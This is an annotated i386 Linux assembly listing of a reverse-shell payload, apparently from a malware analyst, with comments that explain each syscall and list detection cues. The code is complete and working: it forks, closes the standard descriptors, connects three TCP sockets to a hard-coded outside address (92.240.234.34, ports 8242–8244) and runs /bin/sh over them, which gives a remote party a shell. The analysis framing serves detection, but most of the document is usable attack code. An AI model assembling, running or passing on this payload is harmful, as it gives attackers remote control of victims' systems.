;-----------------------------------------------------------------------
; Analyst annotation (NASM syntax, i386 Linux, raw int 80h syscalls).
;
; What this payload does, as visible in the code below:
;   1. fork(); the parent simply returns to whatever called it.
;   2. The child closes fds 0, 1 and 2.
;   3. The child calls bhcon three times, each time creating a TCP socket
;      and connect()ing it to the hard-coded IPv4 address 0x22eaf05c
;      (bytes 5c f0 ea 22 in memory, i.e. 92.240.234.34) on ports 8242,
;      8243 and 8244 respectively.  Because 0-2 were just closed, each
;      socket() is expected to take the lowest free descriptor, so the
;      three connections end up as the shell's stdin/stdout/stderr
;      (relies on kernel fd allocation order - confirm when analysing).
;   4. The child execve()s "/bin/sh" with argv = {"/bin/sh", NULL} and
;      envp = NULL; if execve fails it calls exit().
;   5. Any failed connect() makes the child exit() with status 3.
;
; Observable behaviour useful for detection: fork followed by close(0..2),
; three outbound connects from one process to a single remote host on
; three consecutive ports, then execve("/bin/sh") with no environment.
;
; Stack note: bhcon keeps its socket() args, connect() args and the
; sockaddr_in in the 32 bytes BELOW esp (esp-32 .. esp-1) without moving
; esp.  Linux int 80h does not clobber that area, but a signal delivered
; mid-function would; this is a fragility, not a feature.
;-----------------------------------------------------------------------
BITS 32
        xor eax, eax
        mov al, 2                   ; eax = 2 = sys_fork
        int 80h
        cmp eax, 0
        je child                    ; child sees 0
        ret                         ; parent: return to caller

exit:
        xor eax, eax
        inc eax                     ; eax = 1 = sys_exit (ebx = exit status, whatever it holds)
        int 80h

child:
        xor ebx, ebx
        push ebx                    ; [esp] = fd counter, starts at 0
l0:
        mov ebx, [esp]              ; ebx = fd to close
        mov al, 6                   ; eax = 6 = sys_close; only al is set, so this
                                    ; relies on eax's upper bytes already being 0
                                    ; (child's fork return / previous close returning 0)
        int 80h
        inc byte [esp]
        cmp byte [esp], 3
        je l1                       ; done after closing 0, 1, 2
        jmp l0

l1:
        mov dx,8242                 ; dx = port for first connection
        call bhcon
        mov dx,8243                 ; second connection
        call bhcon
        mov dx,8244                 ; third connection
        call bhcon
        jmp mstr

havestr:
        pop ebx                     ; ebx = address of the "/bin/sh" string pushed by call
        xor eax, eax
        mov al, 11                  ; eax = 11 = sys_execve
        xor ecx, ecx
        push ecx                    ; argv[1] = NULL
        push ebx                    ; argv[0] = "/bin/sh"
        mov ecx, esp                ; ecx = argv
        xor edx, edx                ; edx = envp = NULL
        int 80h
        mov eax, 1                  ; execve returned -> exit()
        int 80h

mstr:
        call havestr                ; pushes the address of the string below
        db "/bin/sh",0

;-----------------------------------------------------------------------
; bhcon: create a TCP socket and connect it to 92.240.234.34:dx.
; In:    dx = TCP port (host byte order; converted to network order below)
; Out:   new socket fd is the lowest free descriptor (return value of
;        socket() is not otherwise preserved)
; Clobb: eax, ebx, ecx, edx, flags; 32 bytes below esp
; On connect() failure jumps to exit (does not return).
;-----------------------------------------------------------------------
bhcon:
        mov [esp-16], dx            ; stash port (reloaded after socket() clobbers regs)
        mov dword [esp-12], 2       ; socket() args: domain   = 2 = AF_INET
        mov dword [esp-8], 1        ;                type     = 1 = SOCK_STREAM
        mov dword [esp-4], 0        ;                protocol = 0
        mov eax,102                 ; eax = 102 = sys_socketcall
        mov ebx,1                   ; ebx = 1 = SYS_SOCKET
        mov ecx,esp
        sub ecx,12                  ; ecx = &args (esp-12)
        int 80h                     ; eax = socket fd
        xor ecx, ecx
        mov byte [esp-32], 2        ; sockaddr_in.sin_family = AF_INET (low byte)
        mov [esp-31], cl            ;                          (high byte = 0)
        mov dx, [esp-16]            ; reload port
        mov [esp-30], dh            ; sin_port, big-endian: high byte first
        mov [esp-29], dl            ;                        then low byte
        mov dword [esp-28], 0x22eaf05c ; sin_addr = 92.240.234.34 (network order in memory)
        mov [esp-24], ecx           ; sin_zero[0..3] = 0
        mov [esp-20], ecx           ; sin_zero[4..7] = 0
        mov [esp-12], eax           ; connect() args: sockfd
        mov [esp-8], esp
        sub dword [esp-8], 32       ;                 addr = &sockaddr_in (esp-32)
        mov dword [esp-4], 16       ;                 addrlen = sizeof(sockaddr_in)
        mov eax,102                 ; eax = 102 = sys_socketcall
        mov ebx,3                   ; ebx = 3 = SYS_CONNECT
        mov ecx,esp
        sub ecx,12                  ; ecx = &args (esp-12)
        int 80h
        cmp eax, 0
        jne exit                    ; connect failed -> exit(); ebx is still 3, so status 3
        ; Disabled debug write(sockfd, &0xDEAD1234, 4) left by the author:
        ; mov dword [esp-16], 0xDEAD1234
        ; mov eax, 4
        ; mov ebx, [esp-12]
        ; mov ecx, esp
        ; sub ecx, 16
        ; mov edx, 4
        ; int 80h
        ret